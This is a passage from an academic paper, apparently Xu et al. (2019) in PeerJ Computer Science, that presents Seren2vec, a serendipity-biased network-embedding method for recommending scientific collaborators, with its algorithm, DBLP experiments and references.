implement without the requirement of contents (Hameed, Al Jadaan & Ramachandram, 2012). Random walk-based recommendation Random walk is the most common technique for collaborators recommendation. The basic idea of Random walk is to compute the structure similarity between nodes in co-author network based on the transition probability. Xia et al. (2014) explored three academic factors, i.e., coauthor order, latest collaboration time, and times of collaboration, to quantify the link importance and performed a biased random walk in academic social network for recommending most valuable collaborators. Araki et al. (2017) made use of Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 4/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.178 both topic model and random walk with restart method for recommending interdisciplinary collaborators. They combined the content-based and random-walk based methods for collaborators recommendation. Kong’s works (Kong et al., 2017; Kong et al., 2016) exploited the dynamic research interests, academic influences and publication contents of scholars for collaborators recommendation. Random Walk can be improved flexibly by adjusting its transition matrix, therefore it have been widely used by researchers in their recommendation scenarios. To sum up, all kinds of recommendation algorithms are designed based on the similarity between academic entities in order to enhance the recommendation accuracy. Most of them ignore the integration of other serendipity-related elements for the design of recommender systems. Consequently, they are not applicable to our task of recommending serendipitous collaborators. Serendipity in recommender systems Increasing researchers are interested in investigating serendipity in recommender systems, Kotkov, Wang & Veijalainen (2016) wrote a survey to summarize the serendipity problem in recommender systems, including the related concepts, the serendipitous recommendation technologies and metrics for evaluating the recommendation results. They also analyzed the challenges of serendipity in recommender systems (Kotkov, Veijalainen & Wang, 2016). Herlocker et al. (2004) considered that serendipitous recommendations aim to help users finding interesting and surprising items that they would not discover by themselves. While Shani and Gunawardana (Shani & Gunawardana, 2011) described that serendipity associates with users’ positive emotions on the novel items. The serendipitous items usually are unexpected and useful simultaneously for a user (Manca, Boratto & Carta, 2015; Iaquinta et al., 2010). From these perspectives, serendipity emphasizes the unexpectedness and value components. Serendipitous recommendation approaches Various serendipity-enhancement approaches have been proposed by researchers. Zhang & Hurley (2008) suggested to maximize the diversity of the recommendation list and kept adequate similarity to the user query for avoiding monotonous recommendations. Zhang et al. (2012) proposed a Full Auralist recommendation algorithm in order to balance the accuracy, diversity, novelty and serendipity of recommendations simultaneously. However, the Auralist algorithm is difficult to realize for its complexity. Said et al. (2013) proposed a new k-furthest neighbor (KFN) recommendation algorithm in order to recommend novel items by selecting items which are disliked by dissimilar users. Onuma, Tong & Faloutsos (2009) proposed a novel TANGENT algorithm to broaden user tastes, and they aim to recommend the items in a graph that not only are relevant to the target users, but also have connectivity to other groups. Evaluation of serendipitous recommender systems In terms of the evaluation of the proposed serendipitous recommendation strategies, the widely used metrics are unexpectedness, usefulness and serendipity, where serendipity is the combination of unexpectedness and usefulness metrics. Adamopoulos & Tuzhilin (2015) Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 5/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.178 considered that an unexpected item is not contained in the set of expected items of the target user, and the usefulness of an item can be approximated by the items’ ratings given by users. Murakami, Mori & Orihara (2007) and Ge, Delgado-Battenfeld & Jannach (2010) indicated that the unexpectedness metric is determined by the primitive recommendation methods which produce relevant recommendations, and the item not in primitive recommendation set is regarded as an unexpected item. The serendipity of the recommendation list is determined by the rate of both unexpected and useful items (Zheng, Chan & Ip, 2015; Ge, Delgado-Battenfeld & Jannach, 2010; Murakami, Mori & Orihara, 2007). Meanwhile, Zheng, Chan & Ip (2015) suggested that the usefulness of a recommended item depends on whether the target user selects or favors it. These literatures shed some light on the development of serendipitous recommender systems in different fields. Our work also refer to them for extracting the core components of serendipity, and evaluating the serendipitous recommendations from the serendipity- based metrics. THE DEFINITION OF SERENDIPITOUS COLLABORATORS ‘‘Serendipity’’ has been recognized as one of the most untranslatable words. The term serendipity origins from a fairy tale, ‘‘The Three Princes of Serendip’’ (West, 1963). The three princes were always making fortunate discoveries in their wandering adventures, and the accidental but valuable discoveries denote serendipity. Nevertheless, it is unclear what makes a collaborator serendipitous to his/her target scholar. In this paper, we define serendipitous scientific collaborators from three components: relevance, unexpectedness and value, corresponding with the indices of network proximity, topic diversity, and collaborator influence, respectively. We describe the details of these indices and their quantifications in the following three subsections. Relevance score Relevance between target scholar and his/her collaborators may be quantified with their proximity in co-author network. Therefore, we perform Random Walk with Restart (RWR) (Vargas & Castells, 2011; Tong, Faloutsos & Pan, 2008) in the co-author network for computing the relevance score of all collaborator nodes for their target scholars. Finally, we get the relevance score between each pair of collaborators. Unexpectedness score Unexpected scientific collaborators have connectivity to different research areas of their target scholars. Such unexpected collaborators may expand target scholars’ horizons, since they have diverse research topics compared with their target scholars. We get each scholar’s research areas by LDA (Blei, Ng & Jordan, 2003), and a collaborator who has connectivity to other areas different from that of his/her target scholar is regarded as a unexpected collaborator. LDA computes the cosine similarity between the topic probability distribution of each scholar and area, where the topic probability distribution of a scholar is parsed from his/her publication contents, and the topic probability distribution of an area is extracted from the proportion of each topic contained in this area. The areas Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 6/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.178 Figure 1 The framework of Seren2vec. The core of this framework is the attachment of serendipity to the collaboration edges, and the edge weight is quantified based on the three indices in definition in a linear way. Therefore, seren2vec contributes to a serendipity-biased representation learn- ing. Full-size DOI: 10.7717/peerjcs.178/fig-1 with similarity higher than 0.6 are regarded as the research areas of a scholar. Finally we add the betweenness centrality (Leydesdorff, 2007) of a collaborator node with the number of communities it crosses as its unexpectedness score for its target scholar, since betweenness centrality represents the ability of a node to transfer information among separate communities in a network, which stresses the strong position of unexpected node. Value score Value of a scholar is defined as the influence of this scholar node, and more influential nodes are more valuable for his/her collaborators in co-author network. We compute the value scores of all collaborator nodes with the Eigenvector Centrality (Bonacich, 2007), where the centralized value of a node is determined by the nodes linked by it. If the high-degree node connects with the target node, it usually are more valuable than those low-degree nodes for the target node. Besides, the influence of a node not only depends on its degree, but also depends on its neighbor nodes’ influences according to the peculiarity of Eigenvector Centrality. The relevance, unexpectedness, and value scores are computed between each pair of collaborators according to above quantification methods. A serendipitous collaborator has high unexpectedness score, high value score, and low relevance score for his/her target scholar relatively. THE FRAMEWORK OF SEREN2VEC In this section, we propose the framework of Seren2vec, which aims to recommend serendipitous collaborators for scholars by learning the vector representation of each author node in co-author network. The whole framework of Seren2vec is shown in Fig. 1, which contains four main steps: (1) Compute the relevance, unexpectedness and value scores of each collaborator for his/her target scholar. (2) Construct a co-author network based on the collaboration data extracted from DBLP, where the edge weight is determined by the linear combination of relevance, unexpectedness and value scores. (3) Perform Seren2vec in co-author network, where the walker jumps to the next node B from node A with the proportional probability of their edge weight. The edge weight Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 7/19 https://peerj.com https://doi.org/10.7717/peerjcs.178/fig-1 http://dx.doi.org/10.7717/peerj-cs.178 is attached with the extent of serendipity, i.e., w1 in Fig. 1 shows the serendipity extent brought by B for target scholar A. (4) Learn the representations of all author nodes with low dimensional vectors, and then compute the cosine similarity betweenauthor vectors for generating the recommendation list composed of Top-N similar collaborators. Integrate serendipity into co-author network We first integrate serendipity into co-author network G=(V,E) for vector representation learning of author nodes. The node v ∈V in network represents the author, and edge e ∈E reflects the collaboration relationship between two connected nodes. We attach the serendipity of a collaborator for his/her target scholar to their edge weight. From Fig. 1, our co-author network is directed, because the edge weight of node A to B is different from that of B to A. In other words, the serendipity brought by A for B is different from that of B for A, since A’s relevance, unexpectedness and value scores for B are different from that of B for A. Serendipitous collaborators are unexpected and valuable, but less relevant for their target scholars; therefore, we combine three indices as the edge weight in a linear way. The expression of edge weight is as follows: w =α×RS+β×US+γ ×VS, (1) where RS,US and VS represent the relevance score, unexpectedness score, and value score, respectively. While α is smaller than β and γ , as α determines the proportion of relevance score, and α+β+γ =1. We aim to adjust these parameters and find the optimal collocation of them by analyzing the experimental results. Seren2vec We improve the traditional DeepWalk model to learn vector representations of author nodes in co-author network for our recommendation task. In terms of DeepWalk, the walker during random walk jumps to the next node with the equal probability, 1N , where N represents the number of last node’s collaborators. DeepWalk excludes the importance or corresponding attributes of nodes. Take the random walk process in Fig. 1 as an example, the walker arrives at node A, and continues to walk to the next node. It will walk to B with the probability of 13 according to DeepWalk. In this work, we distinguish the importance of all collaborator nodes based on their serendipity extent for their target nodes. The extent of serendipity brought by collaborator B for target scholar A corresponds to their edge weight w1. If w1 is higher than w2 and w3, the walker will jump to B from A with higher probability. We attach serendipity to the edge weight in co-author network, and finally guide to a serendipity-biased DeepWalk. As a consequence, the representation of the author vector will carry the attribute of serendipity. If a collaborator is serendipitous for a target scholar, his/her vector representation is similar with that of target scholar. The complete algorithm is described in Algorithm 1, where b represents the set of betweenness centralities with respect to each author node, and bi denotes the betweenness centrality of Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 8/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.178 Figure 2 The flow chart of Seren2vec. Seren2vec includes three main processes: integration of serendip- ity into DeepWalk, vector representation learning of each scholar, and collaborators recommendation based on the cosine similarity between vectors. Full-size DOI: 10.7717/peerjcs.178/fig-2 node i.RS(i,j),US(i,j),VS(i,j) correspond with the relevance score, unexpectedness score, and value score of collaborator j for his/her target scholar i, respectively. The flow chart of Seren2vec is shown in Fig. 2. Vector representation of Graph The random walker walks on the co-author network with the probability of p(i,j) from the scholar node i to its collaborator node j: p(i,j)= Weight(i,j)∑ q∈M(i),q6=iWeight(i,q) , (2) where M(i) is the set of scholar i’s collaborators. We can find from Perozzi, Al-Rfou & Skiena (2014) that if the random walk algorithm is performed on the network with power law distribution, the nodes being visited also follow the power law distribution. This is the same distribution with the term frequency in natural language. Therefore, it is reasonable Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 9/19 https://peerj.com https://doi.org/10.7717/peerjcs.178/fig-2 http://dx.doi.org/10.7717/peerj-cs.178 Algorithm 1: Seren2vec Input: Graph G= (V,E), transfer matrix T , betweenness centrality set b, community degree set c, eigenvector centrality set e, parameter α, parameter β, parameter γ , context size w, dimension of vertex vector d, walks per vertex r, walk length l, length of recommendation list N Output: Recommendation List Rec 1 for edge(i,j)∈E do 2 RS(i,j)=RWR(j,T); 3 for edge(i,j)∈E do 4 US(i,j)=bj+cj; 5 for edge(i,j)∈E do 6 VS(i,j)=ej; 7 Build the weighted co-author network; 8 for edge(i,j)∈E do 9 Weight(i,j)=α×RS(i,j)+β×US(i,j)+γ ×VS(i,j); 10 for k=0;k <r;k++do 11 for u∈V do 12 walk[u]=Biased Random Walk(G,u,l); 13 P =SkipGram(walk,w); 14 for t =0;t <row(P);t++do 15 Rec[t]=Top-N similar collaborators; 16 return Rec; to regard a node in network as a word, and consider all the previous vertices being visited in the random walk as the sentence. Moreover, we utilize the Word2vec (Mikolov et al., 2013) model to input the sentence sequences generated during random walk into the Skip-Gram model, and take advantages of the stochastic gradient descent and the back propagation algorithm to optimize the vector representations. Finally, we obtain the optimal vector representation of each vertex in our co-author network. Specifically, in order to learn the vector representations of vertices, Seren2vec makes use of the local information from the truncated random walks by maximizing the probability of a vertex vi in terms of the previous vertices being visited in the random walk: P({vi−w,...,vi+w}\vi|φ(vi))= i+w∑ j=i−w,j 6=i P(vj|φ(vi)), (3) where φ denotes the latent topological representation associated with each vertex vi in the graph, and φ is a matrix with |V |×d. For speeding the training time, Hierarchical Softmax is used to approximate the probability distribution by allocating the vertices to the leaves Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 10/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.178 of the binary tree, and we compute P(vj|φ(vi)) as follows: P(vj|φ(vi))= dlog|N|e∑ l=1 1 1+e−φ(vi)·ψ(sl) , (4) where ψ(sl) represents the parent of the tree node sl. In addition, (s0,s1,...,slog|V |) is the sequence to detect the vertex vj, and s0 is the tree root. The output of Seren2vec is the latent vector representations of all scholar nodes with d-dimension in our co-author network. We calculate the cosine similarity between other vectors with the target scholar vector vi: sim(xvi,xvj )= xvi ·xvj√ |xvi|·|xvj| ,vj ∈V and vj 6=vi. (5) Finally, Top-N similar scholars, who are serendipitous to the target scholar, are contained in the collaborator list for recommendation. EXPERIMENTS In this section, we analyze and compare the performance of Seren2vec with other baseline methods for the serendipitous collaborators recommendation. We initialize the context size w as 10, the vector dimension d as 128, number of walks r as 10, and walk length l as 80 for conducting experiments. Data set We extract collaboration data from five areas including Artificial Intelligence, Computer graphics and multimedia, Computer Networks, Data Mining and Software Engineering in DBLP data set. The co-author network is built by utilizing the collaboration data from year 2010 to 2012, and there are 49,317 nodes and 242,728 edges in the network. We randomly choose 100 authors who have one collaborator at least as the target scholars, and the final goal of our work is to recommend the serendipitous collaborators for them via Seren2vec. Baseline methods DeepWalk DeepWalk (Perozzi, Al-Rfou & Skiena, 2014) is a widely used network embedding algorithm, which learns the latent vector representations of nodes in a network. It takes a graph as input and outputs the latent vector representations of all nodes in graph. DeepWalk can be easily utilized to obtain the author vectors. The core idea of DeepWalk is to take the random walk paths in network as sentences, and nodes as words. Applying the sentence sequences to SkipGram enable to learn the distributed representations of nodes. Node2vec Node2vec (Grover & Leskovec, 2016) is a improved version of DeepWalk. It improves the strategy of random walk through the parameters p and q, and considers the macrocosmic and microcosmic information simultaneously. Node2vec controls the transition probability of walker, where p represents the returning probability, and q denotes the probability of jumping to the next node. While DeepWalk sets both p and q at 1, and ignores other factors that will influence the generation of sentence sequences. Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 11/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.178 RWRW We also compare our Seren2vec with the baseline algorithm which does not adopt the vector representation strategy. Therefore, we run the serendipity-biased random walk with restart algorithm on our weighted co-author network (RWRW) for comparison. TANGENT The TANGENT (Onuma, Tong & Faloutsos, 2009) algorithm is designed to recommend the relevant collaborators who have connectivity to other groups. KFN The KFN (Said et al., 2013) algorithm aims to recommend the novel collaborators who are disliked by the dissimilar neighborhood of the target scholar. This approach is contrary to K nearest neighbors (KNN) (Deng et al., 2016). Evaluation metrics We refer to the metrics in Ge, Delgado-Battenfeld & Jannach (2010), Zheng, Chan & Ip (2015) and Kotkov, Wang & Veijalainen (2016) for evaluating our serendipitous collaborators recommendation, which are the serendipity-based metrics including unexpectedness, value and serendipity. We compute the average RS and US of each target scholars’s collaborators. If RS of one collaborator is higher than the average RS, and on the contrary, his/her US is lower than the average US, we regard this collaborator as the expected one of target scholar. Expected collaborators are more relevant and less unexpected than other collaborators for their target scholars. According to Ge, Delgado-Battenfeld & Jannach (2010) and Zheng, Chan & Ip (2015), a recommended collaborator not in the set of target scholar’s expected collaborators is considered as unexpected. Therefore, we extract the expected collaborators of each target scholar first, and a recommended collaborator not in the expected set is evaluated as unexpected. The unexpectedness is measured as the rate of unexpected collaborators in the recommendation list. In terms of the metric of value, Zheng, Chan & Ip (2015) measured the usefulness of a recommended item through its rating given by the target user. While in our recommendation scenario, we analyze the collaboration times between the recommended collaborator and target scholar in the next 5 years. If their collaboration times is over or equal to 3 times from 2013 to 2017, the recommended collaborator is evaluated as valuable. Besides, the value is measured as the rate of valuable collaborators in the recommendation list. Ge, Delgado-Battenfeld & Jannach (2010) combined the unexpectedness and value metric to evaluate serendipity. Similarly, we measure serendipity through the rate of collaborators who are both unexpected and valuable for the target scholar in the recommendation list. Recommendation results analysis We take the widely used serendipity-based metrics to evaluate our recommendation results, including unexpectedness, value and serendipity. Therefore, the evaluations are no longer limited by the accuracy-based metrics. In this section, we examine the effects of different experimental parameter sets on the recommendation performance, including the range of d, r, l, w, different combinations of α, β and γ , and the length of recommendation list N . Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 12/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.178 Figure 3 Effects of the recommendation list length and different combinations of α, β and γ on rec- ommendation performance via Seren2vec. (A) Precision (B) Recall (C) Unexpectedness (D) Value and (E) Serendipity of the recommendations. (When α=0.25,β=0.375, and γ =0.375, Seren2vec shows the highest precision, value and serendipity. Meanwhile, the optimal N is 5). Full-size DOI: 10.7717/peerjcs.178/fig-3 Effects of the recommendation list We measured the recommendation results with different length of recommendation list N and different combinations of α,β and γ via Seren2vec. The results shown in Fig. 3 indicate that when α=0.25, β=0.375 and γ =0.375, the recommendation performance is better than others with respect to the precision Fig. 3A), value (Fig. 3D) and serendipity (Fig. 3E) evaluations. We also find that the optimal N is 5. The precision, value and serendipity decrease with the increases of N , which are contrary to the recall (Fig. 3B) and unexpectedness (Fig. 3C). Furthermore, the unexpectedness of different combinations keeps close distributions with the variation of N . Furthermore, we show the effects of the recommendation list length with α=0.25,β= 0.375, and γ =0.375 via different baseline methods. From Fig. 4, Node2vec obtains the highest precision (Fig. 4A) and recall (Fig. 4B), but it shows the worst performance from the serendipity-based metrics (Figs. 4C–4E) evaluation. Our Seren2vec outperforms others in terms of the serendipity-based metrics, and keeps adequate accuracy simultaneously. RWRW has lower precision than Seren2vec because it lacks the vector representation process, but it has the second highest serendipity finally because of the serendipity-biased random walk. Meanwhile, the collaborators recommended by Seren2vec show higher unexpectedness than others when the length of recommendation list is lower than 60. Node2vec and Deepwalk share close serendipity with low value, because they have not integrated other serendipity-related elements into the vector representation learning. Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 13/19 https://peerj.com https://doi.org/10.7717/peerjcs.178/fig-3 http://dx.doi.org/10.7717/peerj-cs.178 Figure 4 Effects of the recommendation list length with α = 0.25,β = 0.375, and γ = 0.375 on rec- ommendation performance via different baseline methods. (A) Precision (B) Recall (C) Unexpectedness (D) Value and (E) Serendipity of the recommendations. (Node2vec shows the highest accuracy. Seren2vec shows the highest serendipity, and it is superior to RWRW in terms of the precision evaluation). Full-size DOI: 10.7717/peerjcs.178/fig-4 Parameter sensitivity We tested the recommendation performance with different parameters, and the length of recommendation list is optimally five according to the last subsection. When testing one parameter of l (Fig. 5A), r (Fig. 5B), d (Fig. 5C), w (Fig. 5D) with different values on the recommendation performance, we fix other three parameters with corresponding initial values. We can get from Fig. 5 that the measurements from both accuracy-based and serendipity-based metrics almost have the steady distributions under different parameter sets. We take the set where r =80, d =208, l =80 and w =6 as our final parameter set, since each of them contributes to the highest serendipity and maintains adequate accuracy simultaneously. Performance comparison Next, we compare our Seren2vec which are assigned to the optimal parameters with other two baseline methods. We set the length of recommendation list of TANGENT and KFN as 5, which is the same with Seren2vec. From the comparison results in Fig. 6, Seren2vec obtains better performance for recommending the serendipitous collaborators via the evaluations from serendipity-based metrics, since it adopts the serendipity-biased representation learning strategy. Its highest value contributes to the highest serendipity. TANGENT and KFN stress the unexpectedness of recommendations, but they ignore the value component of serendipity. Therefore, they are inferior to Seren2vec in terms of the serendipity evaluation. Seren2vec outperforms other two methods except for the unexpectedness evaluation, which is 0.014 lower than the unexpectedness of TANGENT, Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 14/19 https://peerj.com https://doi.org/10.7717/peerjcs.178/fig-4 http://dx.doi.org/10.7717/peerj-cs.178 Figure 5 Effects of different d, r, l and w on recommendation performance. (A) The effects of l (B) r (C) d and (D) w. (Seren2vec almost keeps steady distribution on recommendation performance with the variation of parameters). Full-size DOI: 10.7717/peerjcs.178/fig-5 but 0.048 higher than that of KFN. Furthermore, we find that the recall of three methods are very low, and Seren2vec has higher recall than TANGENT and KFN slightly. In summary, our proposed Seren2vec is superior to other baseline methods for recommending more serendipitous collaborators. It learns the serendipity-biased vector representation of each author node in co-author network successfully, which integrates the serendipity between two connected nodes. CONCLUSION This paper introduces the scientific collaborators from a new perspective of serendipity. The serendipitous collaborator has high topic diversity, high influence and low proximity in co-author network for his/her target scholar relatively. We focused on designing an effective algorithm to integrate serendipity into collaborators recommender system. Specifically, we improved the DeepWalk algorithm, where the sentence sequences are generated by performing a serendipity-biased random walk. Seren2vec represents the author nodes in the co-author network with the low-dimensional vectors, which are attached with the attributes of serendipity successfully. Finally, we computed the cosine similarity between Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 15/19 https://peerj.com https://doi.org/10.7717/peerjcs.178/fig-5 http://dx.doi.org/10.7717/peerj-cs.178 Figure 6 Performance comparisons between different recommendation methods. (Seren2vec is supe- rior to TANGENT and KFN by evaluating from both precision and serendipity metrics). Full-size DOI: 10.7717/peerjcs.178/fig-6 the vector of target scholar and other vectors, and extracted Top-N similar collaborators for recommendation. The extensive experiments are conducted on the DBLP data set, and the experimental results show that Seren2vec is more effective than other baseline approaches by evaluating from the serendipity-based metrics. Seren2vec improves the serendipity of recommendation list and maintains adequate accuracy simultaneously. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Zhenzhen Xu analyzed the data. • Yuyuan Yuan conceived and designed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • Haoran Wei performed the experiments, performed the computation work. • Liangtian Wan contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 16/19 https://peerj.com https://doi.org/10.7717/peerjcs.178/fig-6 http://dx.doi.org/10.7717/peerj-cs.178 Data Availability The following information was supplied regarding data availability: Data is available at https://snap.stanford.edu/data/com-DBLP.html. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.178#supplemental-information. REFERENCES Adamopoulos P, Tuzhilin A. 2015. On unexpectedness in recommender systems: or how to better expect the unexpected. ACM Transactions on Intelligent Systems and Technology 5(4):Article 54. Araki M, Katsurai M, Ohmukai I, Takeda H. 2017. Interdisciplinary collaborator recommendation based on research content similarity. IEICE Transactions on Information and Systems 100(4):785–792 DOI 10.1587/transinf.2016DAP0030. Blei DM, Ng AY, Jordan MI. 2003. Latent dirichlet allocation. Journal of Machine Learning Research 3(Jan):993–1022. Bonacich P. 2007. Some unique properties of eigenvector centrality. Social Networks 29(4):555–564 DOI 10.1016/j.socnet.2007.04.002. Deng Z, Zhu X, Cheng D, Zong M, Zhang S. 2016. Efficient kNN classification algorithm for big data. Neurocomputing 195:143–148 DOI 10.1016/j.neucom.2015.08.112. Ge M, Delgado-Battenfeld C, Jannach D. 2010. Beyond accuracy: evaluating recommender systems by coverage and serendipity. In: Proceedings of the fourth ACM conference on recommender systems. New York: ACM, 257–260 DOI 10.1145/1864708.1864761. Goldberg Y, Levy O. 2014. word2vec explained: deriving Mikolov et al.’s negative- sampling word-embedding method. ArXiv preprint. arXiv:1402.3722. Gollapalli SD, Mitra P, Giles CL. 2012. Similar researcher search in academic environ- ments. In: Proceedings of the 12th ACM/IEEE-CS joint conference on digital libraries. New York: ACM, 167–170 DOI 10.1145/2232817.2232849. Grover A, Leskovec J. 2016. node2vec: scalable feature learning for networks. In: Proceedings of the 22nd ACM SIGKDD international conference on knowledge discovery and data mining. New York: ACM, 855–864 DOI 10.1145/2939672.2939754. Hameed MA, Al Jadaan O, Ramachandram S. 2012. Collaborative filtering based recommendation system: a survey. International Journal on Computer Science and Engineering 4(5):859–876. Heck T, Peters I, Stock WG. 2011. Testing collaborative filtering against co-citation analysis and bibliographic coupling for academic author recommendation. In: Proceedings of the 3rd ACM RecSys’ 11 workshop on recommender systems and the social web. New York: ACM, 16–23. Herlocker JL, Konstan JA, Terveen LG, Riedl JT. 2004. Evaluating collaborative filtering recommender systems. ACM Transactions on Information Systems (TOIS) 22(1):5–53 DOI 10.1145/963770.963772. Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 17/19 https://peerj.com https://snap.stanford.edu/data/com-DBLP.html http://dx.doi.org/10.7717/peerj-cs.178#supplemental-information http://dx.doi.org/10.7717/peerj-cs.178#supplemental-information http://dx.doi.org/10.1587/transinf.2016DAP0030 http://dx.doi.org/10.1016/j.socnet.2007.04.002 http://dx.doi.org/10.1016/j.neucom.2015.08.112 http://dx.doi.org/10.1145/1864708.1864761 http://arXiv.org/abs/1402.3722 http://dx.doi.org/10.1145/2232817.2232849 http://dx.doi.org/10.1145/2939672.2939754 http://dx.doi.org/10.1145/963770.963772 http://dx.doi.org/10.7717/peerj-cs.178 Hofmann T. 2017. Probabilistic latent semantic indexing. ACM SIGIR Forum 51(2):211–218 DOI 10.1145/3130348.3130370. Iaquinta L, De Gemmis M, Lops P, Semeraro G, Molino P. 2010. Can a recommender system induce serendipitous encounters? In: E-commerce. London: InTech. Jannach D, Zanker M, Felfernig A, Friedrich G. 2010. Recommender systems: an introduction. Cambridge: Cambridge University Press. Kim H-N, Ji A-T, Ha I, Jo G-S. 2010. Collaborative filtering based on collaborative tagging for enhancing the quality of recommendation. Electronic Commerce Research and Applications 9(1):73–83 DOI 10.1016/j.elerap.2009.08.004. Kong X, Jiang H, Wang W, Bekele TM, Xu Z, Wang M. 2017. Exploring dynamic research interest and academic influence for scientific collaborator recommendation. Scientometrics 113(1):369–385 DOI 10.1007/s11192-017-2485-9. Kong X, Jiang H, Yang Z, Xu Z, Xia F, Tolba A. 2016. Exploiting publication con- tents and collaboration networks for collaborator recommendation. PLOS ONE 11(2):e0148492 DOI 10.1371/journal.pone.0148492. Konstas I, Stathopoulos V, Jose JM. 2009. On social networks and collaborative recommendation. In: Proceedings of the 32nd international ACM SIGIR conference on Research and development in information retrieval. New York: ACM, 195–202 DOI 10.1145/1571941.1571977. Kotkov D, Veijalainen J, Wang S. 2016. Challenges of serendipity in recommender sys- tems. In: Proceedings of the 12th International conference on web information systems and technologies, volume 2. SCITEPRESS, 251–256 DOI 10.5220/0005879802510256. Kotkov D, Wang S, Veijalainen J. 2016. A survey of serendipity in recommender systems. Knowledge-Based Systems 111:180–192 DOI 10.1016/j.knosys.2016.08.014. Leydesdorff L. 2007. Betweenness centrality as an indicator of the interdisciplinarity of scientific journals. Journal of the Association for Information Science and Technology 58(9):1303–1319. Lopes GR, Moro MM, Wives LK, De Oliveira JPM. 2010. Collaboration recommenda- tion on academic social networks. In: International conference on conceptual modeling, vol. 6413. Berlin, Heidelberg: Springer, 190–199 DOI 10.1007/978-3-642-16385-2_24. Manca M, Boratto L, Carta S. 2015. Behavioral data mining to produce novel and serendipitous friend recommendations in a social bookmarking system. Information Systems Frontiers 20(4):825–839. McNee SM, Riedl J, Konstan JA. 2006. Being accurate is not enough: how accuracy metrics have hurt recommender systems. In: CHI’06 extended abstracts on Human factors in computing systems. New York: ACM, 1097–1101. Mikolov T, Sutskever I, Chen K, Corrado GS, Dean J. 2013. Distributed representations of words and phrases and their compositionality. Neural Information Processing Systems 2:3111–3119. Murakami T, Mori K, Orihara R. 2007. Metrics for evaluating the serendipity of recommendation lists. In: Annual conference of the Japanese society for artificial intelligence. Berlin, Heidelberg: Springer, 40–46 DOI 10.1007/978-3-540-78197-4_5. Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 18/19 https://peerj.com http://dx.doi.org/10.1145/3130348.3130370 http://dx.doi.org/10.1016/j.elerap.2009.08.004 http://dx.doi.org/10.1007/s11192-017-2485-9 http://dx.doi.org/10.1371/journal.pone.0148492 http://dx.doi.org/10.1145/1571941.1571977 http://dx.doi.org/10.5220/0005879802510256 http://dx.doi.org/10.1016/j.knosys.2016.08.014 http://dx.doi.org/10.1007/978-3-642-16385-2_24 http://dx.doi.org/10.1007/978-3-540-78197-4_5 http://dx.doi.org/10.7717/peerj-cs.178 Onuma K, Tong H, Faloutsos C. 2009. TANGENT: a novel,’Surprise me’, recom- mendation algorithm. In: Proceedings of the 15th ACM SIGKDD international conference on knowledge discovery and data mining. New York: ACM, 657–666 DOI 10.1145/1557019.1557093. Perozzi B, Al-Rfou R, Skiena S. 2014. Deepwalk: online learning of social rep- resentations. In: Proceedings of the 20th ACM SIGKDD international con- ference on knowledge discovery and data mining. New York: ACM, 701–710 DOI 10.1145/2623330.2623732. Said A, Fields B, Jain BJ, Albayrak S. 2013. User-centric evaluation of a k-furthest neighbor collaborative filtering recommender algorithm. In: Proceedings of the 2013 conference on computer supported cooperative work. New York: ACM, 1399–1408 DOI 10.1145/2441776.2441933. Sean J, McNee M, Konstan J. 2006. Accurate is not always good: how accuracy metrics have hurt recommender systems. In: Extended abstracts on Human factors in computing systems (CHI06). 1097–1101. Shani G, Gunawardana A. 2011. Evaluating recommendation systems. In: Recommender systems handbook. Berlin, Heidelberg: Springer, 257–297 DOI 10.1007/978-0-387-85820-3_8. Tian H, Zhuo HH. 2017. Paper2vec: citation-context based document distributed representation for scholar recommendation. ArXiv preprint. arXiv:1703.06587. Tong H, Faloutsos C, Pan J-Y. 2008. Random walk with restart: fast solutions and applications. Knowledge and Information Systems 14(3):327–346 DOI 10.1007/s10115-007-0094-2. Vargas S, Castells P. 2011. Rank and relevance in novelty and diversity metrics for recommender systems. In: Proceedings of the fifth ACM conference on recommender systems. New York: ACM, 109–116 DOI 10.1145/2043932.2043955. Wang W, Yu S, Bekele TM, Kong X, Xia F. 2017. Scientific collaboration patterns vary with scholars’ academic ages. Scientometrics 112(1):329–343 DOI 10.1007/s11192-017-2388-9. West SS. 1963. Three princes of serendip. Science 141(3584):862–862. Xia F, Chen Z, Wang W, Li J, Yang LT. 2014. Mvcwalker: random walk-based most valu- able collaborators recommendation exploiting academic factors. IEEE Transactions on Emerging Topics in Computing 2(3):364–375 DOI 10.1109/TETC.2014.2356505. Zhang M, Hurley N. 2008. Avoiding monotony: improving the diversity of recommen- dation lists. In: Proceedings of the 2008 ACM conference on recommender systems. New York: ACM, 123–130 DOI 10.1145/1454008.1454030. Zhang YC, Séaghdha DÓ, Quercia D, Jambor T. 2012. Auralist: introducing serendipity into music recommendation. In: Proceedings of the fifth ACM international conference on web search and data mining. ACM, 13–22 DOI 10.1145/2124295.2124300. Zheng Q, Chan C-K, Ip HH. 2015. An unexpectedness-augmented utility model for making 